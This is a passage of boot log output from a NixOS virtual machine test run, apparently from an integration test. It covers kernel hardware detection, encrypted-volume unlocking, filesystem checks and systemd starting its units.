machine # Aug 02 11:49:32 machine kernel: device-mapper: ioctl: 4.48.0-ioctl (2023-03-01) initialised: dm-devel@redhat.com
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:14 UTC 2024] running udev...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:14 UTC 2024] Starting systemd-udevd version 256.2
machine # Aug 02 11:49:32 machine kernel: rtc_cmos 00:05: RTC can wake from S4
machine # Aug 02 11:49:32 machine kernel: rtc_cmos 00:05: registered as rtc0
machine # Aug 02 11:49:32 machine kernel: rtc_cmos 00:05: setting system clock to 2024-08-02T11:49:14 UTC (1722599354)
machine # Aug 02 11:49:32 machine kernel: rtc_cmos 00:05: alarms up to one day, y3k, 242 bytes nvram
machine # Aug 02 11:49:32 machine kernel: i8042: PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12
machine # Aug 02 11:49:32 machine kernel: serio: i8042 KBD port at 0x60,0x64 irq 1
machine # Aug 02 11:49:32 machine kernel: serio: i8042 AUX port at 0x60,0x64 irq 12
machine # Aug 02 11:49:32 machine kernel: SCSI subsystem initialized
machine # Aug 02 11:49:32 machine kernel: cryptd: max_cpu_qlen set to 1000
machine # Aug 02 11:49:32 machine kernel: ACPI: \_SB_.LNKC: Enabled at IRQ 10
machine # Aug 02 11:49:32 machine kernel: AVX2 version of gcm_enc/dec engaged.
machine # Aug 02 11:49:32 machine kernel: AES CTR mode by8 optimization enabled
machine # Aug 02 11:49:32 machine kernel: input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input0
machine # Aug 02 11:49:32 machine kernel: libata version 3.00 loaded.
machine # Aug 02 11:49:32 machine kernel: ata_piix 0000:00:01.1: version 2.13
machine # Aug 02 11:49:32 machine kernel: uhci_hcd 0000:00:01.2: UHCI Host Controller
machine # Aug 02 11:49:32 machine kernel: uhci_hcd 0000:00:01.2: new USB bus registered, assigned bus number 1
machine # Aug 02 11:49:32 machine kernel: uhci_hcd 0000:00:01.2: detected 2 ports
machine # Aug 02 11:49:32 machine kernel: uhci_hcd 0000:00:01.2: irq 11, io port 0x0000c2c0
machine # Aug 02 11:49:32 machine kernel: usb usb1: New USB device found, idVendor=1d6b, idProduct=0001, bcdDevice= 6.06
machine # Aug 02 11:49:32 machine kernel: usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
machine # Aug 02 11:49:32 machine kernel: usb usb1: Product: UHCI Host Controller
machine # Aug 02 11:49:32 machine kernel: usb usb1: Manufacturer: Linux 6.6.43 uhci_hcd
machine # Aug 02 11:49:32 machine kernel: usb usb1: SerialNumber: 0000:00:01.2
machine # Aug 02 11:49:32 machine kernel: scsi host0: ata_piix
machine # Aug 02 11:49:32 machine kernel: scsi host1: ata_piix
machine # Aug 02 11:49:32 machine kernel: hub 1-0:1.0: USB hub found
machine # Aug 02 11:49:32 machine kernel: hub 1-0:1.0: 2 ports detected
machine # Aug 02 11:49:32 machine kernel: ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc2e0 irq 14
machine # Aug 02 11:49:32 machine kernel: ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc2e8 irq 15
machine # Aug 02 11:49:32 machine kernel: ACPI: \_SB_.LNKA: Enabled at IRQ 10
machine # Aug 02 11:49:32 machine kernel: ACPI: \_SB_.LNKB: Enabled at IRQ 11
machine # Aug 02 11:49:32 machine kernel: virtio_blk virtio5: 1/0/0 default/read/poll queues
machine # Aug 02 11:49:32 machine kernel: virtio_blk virtio5: [vda] 13250560 512-byte logical blocks (6.78 GB/6.32 GiB)
machine # Aug 02 11:49:32 machine kernel: 9pnet: Installing 9P2000 support
machine # Aug 02 11:49:32 machine kernel: vda: vda1 vda2
machine # Aug 02 11:49:32 machine kernel: virtio_blk virtio6: 1/0/0 default/read/poll queues
machine # Aug 02 11:49:32 machine kernel: virtio_blk virtio6: [vdb] 1048576 512-byte logical blocks (537 MB/512 MiB)
machine # Aug 02 11:49:32 machine kernel: virtio_blk virtio7: 1/0/0 default/read/poll queues
machine # Aug 02 11:49:32 machine kernel: virtio_blk virtio7: [vdc] 1048576 512-byte logical blocks (537 MB/512 MiB)
machine # Aug 02 11:49:32 machine kernel: virtio_net virtio0 ens3: renamed from eth0
machine # Aug 02 11:49:32 machine kernel: usb 1-1: new full-speed USB device number 2 using uhci_hcd
machine # Aug 02 11:49:32 machine kernel: usb 1-1: New USB device found, idVendor=0627, idProduct=0001, bcdDevice= 0.00
machine # Aug 02 11:49:32 machine kernel: usb 1-1: New USB device strings: Mfr=1, Product=3, SerialNumber=10
machine # Aug 02 11:49:32 machine kernel: usb 1-1: Product: QEMU USB Tablet
machine # Aug 02 11:49:32 machine kernel: usb 1-1: Manufacturer: QEMU
machine # Aug 02 11:49:32 machine kernel: usb 1-1: SerialNumber: 28754-0000:00:01.2-1
machine # Aug 02 11:49:32 machine kernel: hid: raw HID events driver (C) Jiri Kosina
machine # Aug 02 11:49:32 machine kernel: usbcore: registered new interface driver usbhid
machine # Aug 02 11:49:32 machine kernel: usbhid: USB HID core driver
machine # Aug 02 11:49:32 machine kernel: input: QEMU QEMU USB Tablet as /devices/pci0000:00/0000:00:01.2/usb1/1-1/1-1:1.0/0003:0627:0001.0001/input/input2
machine # Aug 02 11:49:32 machine kernel: hid-generic 0003:0627:0001.0001: input,hidraw0: USB HID v0.01 Mouse [QEMU QEMU USB Tablet] on usb-0000:00:01.2-1/input0
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Passphrase for /dev/vdb:
machine # Aug 02 11:49:32 machine kernel: Key type encrypted registered
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Verifying passphrase for /dev/vdb... - success
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Passphrase for /dev/vdc: reused
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Verifying passphrase for /dev/vdc... - success
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] starting device mapper and LVM...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] mke2fs 1.47.1 (20-May-2024)
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Creating filesystem with 507904 1k blocks and 126976 inodes
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Filesystem UUID: 23cb1f59-7d4e-4dec-a5b3-3cb661029a3a
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Superblock backups stored on blocks:
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] 8193, 24577, 40961, 57345, 73729, 204801, 221185, 401409
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Allocating group tables: done
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Writing inode tables: done
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:30 UTC 2024] Creating journal (8192 blocks): done
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] Writing superblocks and filesystem accounting information: done
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] checking /dev/mapper/cryptroot...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] fsck (busybox 1.36.1)
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] [fsck.ext4 (1) -- /mnt-root/] fsck.ext4 -a /dev/mapper/cryptroot
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] /dev/mapper/cryptroot: clean, 11/126976 files, 42424/507904 blocks
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] mounting /dev/mapper/cryptroot on /...
machine # Aug 02 11:49:32 machine kernel: EXT4-fs (dm-0): mounted filesystem 23cb1f59-7d4e-4dec-a5b3-3cb661029a3a r/w with ordered data mode. Quota mode: none.
machine # Aug 02 11:49:32 machine kernel: EXT4-fs (dm-0): re-mounted 23cb1f59-7d4e-4dec-a5b3-3cb661029a3a r/w. Quota mode: none.
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] mounting nix-store on /nix/.ro-store...
machine # Aug 02 11:49:32 machine kernel: FS-Cache: Loaded
machine # Aug 02 11:49:32 machine kernel: 9p: Installing v9fs 9p2000 file system support
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] mounting tmpfs on /nix/.rw-store...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] mounting overlay on /nix/store...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] mounting shared on /tmp/shared...
machine # Aug 02 11:49:32 machine stage-1-init: [Fri Aug 2 11:49:31 UTC 2024] mounting xchg on /tmp/xchg...
machine # Aug 02 11:49:32 machine kernel: EXT4-fs (dm-0): re-mounted 23cb1f59-7d4e-4dec-a5b3-3cb661029a3a r/w. Quota mode: none.
machine # Aug 02 11:49:32 machine unknown: booting system configuration /nix/store/iwhmxln8mmfmjq5cirkqhf7c3awql97d-nixos-system-machine-test
machine # Aug 02 11:49:32 machine stage-2-init: running activation script...
machine # Aug 02 11:49:32 machine stage-2-init: setting up /etc...
machine # Aug 02 11:49:32 machine systemd[1]: Inserted module 'autofs4'
machine # Aug 02 11:49:32 machine systemd[1]: systemd 256.2 running in system mode (+PAM +AUDIT -SELINUX +APPARMOR +IMA +SMACK +SECCOMP +GCRYPT -GNUTLS +OPENSSL +ACL +BLKID +CURL +ELFUTILS +FIDO2 +IDN2 -IDN +IPTC +KMOD +LIBCRYPTSETUP +LIBCRYPTSETUP_PLUGINS +LIBFDISK +PCRE2 +PWQUALITY +P11KIT +QRENCODE +TPM2 +BZIP2 +LZ4 +XZ +ZLIB +ZSTD +BPF_FRAMEWORK -XKBCOMMON +UTMP -SYSVINIT +LIBARCHIVE)
machine # Aug 02 11:49:32 machine systemd[1]: Detected virtualization kvm.
machine # Aug 02 11:49:32 machine systemd[1]: Detected architecture x86-64.
machine # Aug 02 11:49:32 machine systemd[1]: Hostname set to <machine>.
machine # Aug 02 11:49:32 machine systemd[1]: Initializing machine ID from random generator.
machine # Aug 02 11:49:32 machine kernel: systemd[1]: memfd_create() called without MFD_EXEC or MFD_NOEXEC_SEAL set
machine # Aug 02 11:49:32 machine systemd[1]: bpf-restrict-fs: LSM BPF program attached
machine # Aug 02 11:49:32 machine systemd[1]: Queued start job for default target Graphical Interface.
machine # Aug 02 11:49:32 machine systemd[1]: Created slice Virtual Machine and Container Slice.
machine # Aug 02 11:49:32 machine systemd[1]: Created slice Slice /system/getty.
machine # Aug 02 11:49:32 machine systemd[1]: Created slice Slice /system/modprobe.
machine # Aug 02 11:49:32 machine systemd[1]: Created slice Slice /system/systemd-fsck.
machine # Aug 02 11:49:32 machine systemd[1]: Created slice User and Session Slice.
machine # Aug 02 11:49:32 machine systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
machine # Aug 02 11:49:32 machine systemd[1]: Started Forward Password Requests to Wall Directory Watch.
machine # Aug 02 11:49:32 machine systemd[1]: Expecting device /dev/disk/by-label/ESP...
machine # Aug 02 11:49:32 machine systemd[1]: Expecting device /dev/hvc0...
machine # Aug 02 11:49:32 machine systemd[1]: Expecting device /dev/ttyS0...
machine # Aug 02 11:49:32 machine systemd[1]: Expecting device /sys/subsystem/net/devices/eth1...
machine # Aug 02 11:49:32 machine systemd[1]: Reached target Local Encrypted Volumes.
machine # Aug 02 11:49:32 machine systemd[1]: Reached target Containers.
machine # Aug 02 11:49:32 machine systemd[1]: Reached target Path Units.
machine # Aug 02 11:49:32 machine systemd[1]: Reached target Remote File Systems.
machine # Aug 02 11:49:32 machine systemd[1]: Reached target Slice Units.
machine # Aug 02 11:49:32 machine systemd[1]: Reached target Swaps.
machine # Aug 02 11:49:32 machine systemd[1]: Listening on Process Core Dump Socket.
machine # Aug 02 11:49:32 machine systemd[1]: Listening on Credential Encryption/Decryption.
machine # Aug 02 11:49:32 machine systemd[1]: Listening on Journal Socket (/dev/log).
machine # Aug 02 11:49:32 machine systemd[1]: Listening on Journal Sockets.
machine # Aug 02 11:49:32 machine systemd[1]: Listening on Userspace Out-Of-Memory (OOM) Killer Socket.
machine # Aug 02 11:49:32 machine systemd[1]: Make TPM PCR Policy was skipped because of an unmet condition check (ConditionSecurity=measured-uki).
machine # Aug 02 11:49:32 machine systemd[1]: Listening on udev Control Socket.
machine # Aug 02 11:49:32 machine systemd[1]: Listening on udev Kernel Socket.
machine # Aug 02 11:49:32 machine systemd[1]: Mounting Huge Pages File System...
machine # Aug 02 11:49:32 machine systemd[1]: Mounting POSIX Message Queue File System...
machine # Aug 02 11:49:32 machine systemd[1]: Mounting Kernel Debug File System...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Create List of Static Device Nodes...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Load Kernel Module configfs...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Load Kernel Module drm...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Load Kernel Module efi_pstore...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Load Kernel Module fuse...
machine # Aug 02 11:49:32 machine systemd[1]: Starting mount-pstore.service...
machine # Aug 02 11:49:32 machine systemd[1]: File System Check on Root Device was skipped because of an unmet condition check (ConditionPathIsReadWrite=!/).
machine # Aug 02 11:49:32 machine systemd[1]: Clear Stale Hibernate Storage Info was skipped because of an unmet condition check (ConditionPathExists=/sys/firmware/efi/efivars/HibernateLocation-8cf2644b-4b0b-428f-9387-6d876050dc67).
machine # Aug 02 11:49:32 machine systemd[1]: Starting Journal Service...
machine # Aug 02 11:49:32 machine kernel: pstore: Using crash dump compression: deflate
machine # Aug 02 11:49:32 machine kernel: pstore: Registered efi_pstore as persistent store backend
machine # Aug 02 11:49:32 machine systemd[1]: Starting Load Kernel Modules...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Remount Root and Kernel File Systems...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Coldplug All udev Devices...
machine # Aug 02 11:49:32 machine kernel: fuse: init (API version 7.39)
machine # Aug 02 11:49:32 machine systemd[1]: Mounted Huge Pages File System.
machine # Aug 02 11:49:32 machine systemd[1]: Mounted POSIX Message Queue File System.
machine # Aug 02 11:49:32 machine systemd[1]: Mounted Kernel Debug File System.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Create List of Static Device Nodes.
machine # Aug 02 11:49:32 machine systemd[1]: modprobe@configfs.service: Deactivated successfully.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Load Kernel Module configfs.
machine # Aug 02 11:49:32 machine systemd[1]: modprobe@drm.service: Deactivated successfully.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Load Kernel Module drm.
machine # Aug 02 11:49:32 machine systemd[1]: modprobe@efi_pstore.service: Deactivated successfully.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Load Kernel Module efi_pstore.
machine # Aug 02 11:49:32 machine kernel: EXT4-fs (dm-0): re-mounted 23cb1f59-7d4e-4dec-a5b3-3cb661029a3a r/w. Quota mode: none.
machine # Aug 02 11:49:32 machine systemd[1]: modprobe@fuse.service: Deactivated successfully.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Load Kernel Module fuse.
machine # Aug 02 11:49:32 machine systemd-journald[452]: Collecting audit messages is disabled.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Remount Root and Kernel File Systems.
machine # Aug 02 11:49:32 machine systemd[1]: Mounting FUSE Control File System...
machine # Aug 02 11:49:32 machine systemd[1]: Mounting Kernel Configuration File System...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Load/Save OS Random Seed...
machine # Aug 02 11:49:32 machine systemd[1]: Starting Create Static Device Nodes in /dev gracefully...
machine # Aug 02 11:49:32 machine systemd-journald[452]: Journal started
machine # ░░ Subject: The journal has been started
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ The system journal process has started up, opened the journal
machine # ░░ files for writing and is now ready to process requests.
machine # Aug 02 11:49:32 machine systemd-journald[452]: Runtime Journal (/run/log/journal/dde79fdb4e864fab8a716a4740322152) is 8M, max 97.9M, 89.9M free.
machine # ░░ Subject: Disk space used by the journal
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ Runtime Journal (/run/log/journal/dde79fdb4e864fab8a716a4740322152) is currently using 8M.
machine # ░░ Maximum allowed usage is set to 97.9M.
machine # ░░ Leaving at least 48.9M free (of currently available 971M of disk space).
machine # ░░ Enforced usage limit is thus 97.9M, of which 89.9M are still available.
machine # ░░
machine # ░░ The limits controlling how much disk space is used by the journal may
machine # ░░ be configured with SystemMaxUse=, SystemKeepFree=, SystemMaxFileSize=,
machine # ░░ RuntimeMaxUse=, RuntimeKeepFree=, RuntimeMaxFileSize= settings in
machine # ░░ /etc/systemd/journald.conf. See journald.conf(5) for details.
machine # Aug 02 11:49:32 machine systemd[1]: Started Journal Service.
machine # Aug 02 11:49:32 machine kernel: bridge: filtering via arp/ip/ip6tables is no longer available by default. Update your scripts to load br_netfilter if you need this.
machine # Aug 02 11:49:32 machine systemd-modules-load[453]: Inserted module 'bridge'
machine # Aug 02 11:49:32 machine systemd-modules-load[453]: Inserted module 'macvlan'
machine # Aug 02 11:49:32 machine systemd-modules-load[453]: Inserted module 'tap'
machine # Aug 02 11:49:32 machine kernel: tun: Universal TUN/TAP device driver, 1.6
machine # Aug 02 11:49:32 machine systemd-modules-load[453]: Inserted module 'tun'
machine # Aug 02 11:49:32 machine kernel: loop: module loaded
machine # Aug 02 11:49:32 machine systemd-modules-load[453]: Inserted module 'loop'
machine # Aug 02 11:49:32 machine systemd-modules-load[453]: Module 'ctr' is built in
machine # Aug 02 11:49:32 machine systemd[1]: Finished Load Kernel Modules.
machine # ░░ Subject: A start job for unit systemd-modules-load.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-modules-load.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 53.
machine # Aug 02 11:49:32 machine systemd[1]: Finished mount-pstore.service.
machine # ░░ Subject: A start job for unit mount-pstore.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit mount-pstore.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 47.
machine # Aug 02 11:49:32 machine systemd[1]: Mounted FUSE Control File System.
machine # ░░ Subject: A start job for unit sys-fs-fuse-connections.mount has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit sys-fs-fuse-connections.mount has finished successfully.
machine # ░░
machine # ░░ The job identifier is 13.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Coldplug All udev Devices.
machine # ░░ Subject: A start job for unit systemd-udev-trigger.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-udev-trigger.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 21.
machine # Aug 02 11:49:32 machine systemd[1]: Mounted Kernel Configuration File System.
machine # ░░ Subject: A start job for unit sys-kernel-config.mount has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit sys-kernel-config.mount has finished successfully.
machine # ░░
machine # ░░ The job identifier is 22.
machine # Aug 02 11:49:32 machine systemd[1]: Starting Firewall...
machine # ░░ Subject: A start job for unit firewall.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit firewall.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 58.
machine # Aug 02 11:49:32 machine systemd[1]: Starting Flush Journal to Persistent Storage...
machine # ░░ Subject: A start job for unit systemd-journal-flush.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-journal-flush.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 61.
machine # Aug 02 11:49:32 machine systemd[1]: Platform Persistent Storage Archival was skipped because of an unmet condition check (ConditionDirectoryNotEmpty=/sys/fs/pstore).
machine # ░░ Subject: A start job for unit systemd-pstore.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-pstore.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 46.
machine # Aug 02 11:49:32 machine systemd[1]: Starting Apply Kernel Variables...
machine # ░░ Subject: A start job for unit systemd-sysctl.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-sysctl.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 63.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Load/Save OS Random Seed.
machine # ░░ Subject: A start job for unit systemd-random-seed.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-random-seed.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 16.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Create Static Device Nodes in /dev gracefully.
machine # ░░ Subject: A start job for unit systemd-tmpfiles-setup-dev-early.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-tmpfiles-setup-dev-early.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 32.
machine # Aug 02 11:49:32 machine systemd[1]: Starting Create Static Device Nodes in /dev...
machine # ░░ Subject: A start job for unit systemd-tmpfiles-setup-dev.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-tmpfiles-setup-dev.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 60.
machine # Aug 02 11:49:32 machine systemd-journald[452]: Time spent on flushing to /var/log/journal/dde79fdb4e864fab8a716a4740322152 is 6.904ms for 681 entries.
machine # Aug 02 11:49:32 machine systemd-journald[452]: System Journal (/var/log/journal/dde79fdb4e864fab8a716a4740322152) is 5.6M, max 45.4M, 39.7M free.
machine # ░░ Subject: Disk space used by the journal
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ System Journal (/var/log/journal/dde79fdb4e864fab8a716a4740322152) is currently using 5.6M.
machine # ░░ Maximum allowed usage is set to 45.4M.
machine # ░░ Leaving at least 22.7M free (of currently available 420M of disk space).
machine # ░░ Enforced usage limit is thus 45.4M, of which 39.7M are still available.
machine # ░░
machine # ░░ The limits controlling how much disk space is used by the journal may
machine # ░░ be configured with SystemMaxUse=, SystemKeepFree=, SystemMaxFileSize=,
machine # ░░ RuntimeMaxUse=, RuntimeKeepFree=, RuntimeMaxFileSize= settings in
machine # ░░ /etc/systemd/journald.conf. See journald.conf(5) for details.
machine # Aug 02 11:49:32 machine systemd-journald[452]: Received client request to flush runtime journal.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Apply Kernel Variables.
machine # ░░ Subject: A start job for unit systemd-sysctl.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-sysctl.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 63.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Flush Journal to Persistent Storage.
machine # ░░ Subject: A start job for unit systemd-journal-flush.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-journal-flush.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 61.
machine # Aug 02 11:49:32 machine systemd[1]: Finished Create Static Device Nodes in /dev.
machine # ░░ Subject: A start job for unit systemd-tmpfiles-setup-dev.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-tmpfiles-setup-dev.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 60.
machine # Aug 02 11:49:32 machine systemd[1]: Reached target Preparation for Local File Systems.
machine # ░░ Subject: A start job for unit local-fs-pre.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit local-fs-pre.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 33.
machine # Aug 02 11:49:32 machine systemd[1]: Starting Rule-based Manager for Device Events and Files...
machine # ░░ Subject: A start job for unit systemd-udevd.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-udevd.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 18.
machine # Aug 02 11:49:33 machine systemd-udevd[498]: Using default interface naming scheme 'v255'.
machine # Aug 02 11:49:33 machine systemd[1]: Started Rule-based Manager for Device Events and Files.
machine # ░░ Subject: A start job for unit systemd-udevd.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-udevd.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 18.
machine # Aug 02 11:49:33 machine systemd[1]: Found device /dev/hvc0.
machine # ░░ Subject: A start job for unit dev-hvc0.device has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit dev-hvc0.device has finished successfully.
machine # ░░
machine # ░░ The job identifier is 94.
machine # Aug 02 11:49:33 machine systemd[1]: Found device /dev/ttyS0.
machine # ░░ Subject: A start job for unit dev-ttyS0.device has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit dev-ttyS0.device has finished successfully.
machine # ░░
machine # ░░ The job identifier is 93.
machine # Aug 02 11:49:33 machine (udev-worker)[545]: eth1: Config file /etc/systemd/network/40-eth1.link is applied to device based on potentially unpredictable interface name.
machine # Aug 02 11:49:33 machine systemd[1]: Found device /dev/disk/by-label/ESP.
machine # ░░ Subject: A start job for unit dev-disk-by\x2dlabel-ESP.device has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit dev-disk-by\x2dlabel-ESP.device has finished successfully.
machine # ░░
machine # ░░ The job identifier is 40.
machine # Aug 02 11:49:33 machine systemd[1]: Starting File System Check on /dev/disk/by-label/ESP...
machine # ░░ Subject: A start job for unit systemd-fsck@dev-disk-by\x2dlabel-ESP.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-fsck@dev-disk-by\x2dlabel-ESP.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 38.
machine # Aug 02 11:49:33 machine systemd[1]: Found device Virtio network device.
machine # ░░ Subject: A start job for unit sys-subsystem-net-devices-eth1.device has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit sys-subsystem-net-devices-eth1.device has finished successfully.
machine # ░░
machine # ░░ The job identifier is 87.
machine # Aug 02 11:49:33 machine mtp-probe[575]: checking bus 1, device 2: "/sys/devices/pci0000:00/0000:00:01.2/usb1/1-1"
machine # Aug 02 11:49:33 machine mtp-probe[575]: bus: 1, device: 2 was not an MTP device
machine # Aug 02 11:49:33 machine kernel: input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input3
machine # Aug 02 11:49:33 machine systemd-fsck[585]: fsck.fat 4.2 (2021-01-31)
machine # Aug 02 11:49:33 machine systemd-fsck[585]: Dirty bit is set. Fs was not properly unmounted and some data may be corrupt.
machine # Aug 02 11:49:33 machine systemd-fsck[585]: Automatically removing dirty bit.
machine # Aug 02 11:49:33 machine systemd-fsck[585]: *** Filesystem was changed ***
machine # Aug 02 11:49:33 machine systemd-fsck[585]: Writing changes.
machine # Aug 02 11:49:33 machine systemd-fsck[585]: /dev/vda1: 19 files, 8582/60344 clusters
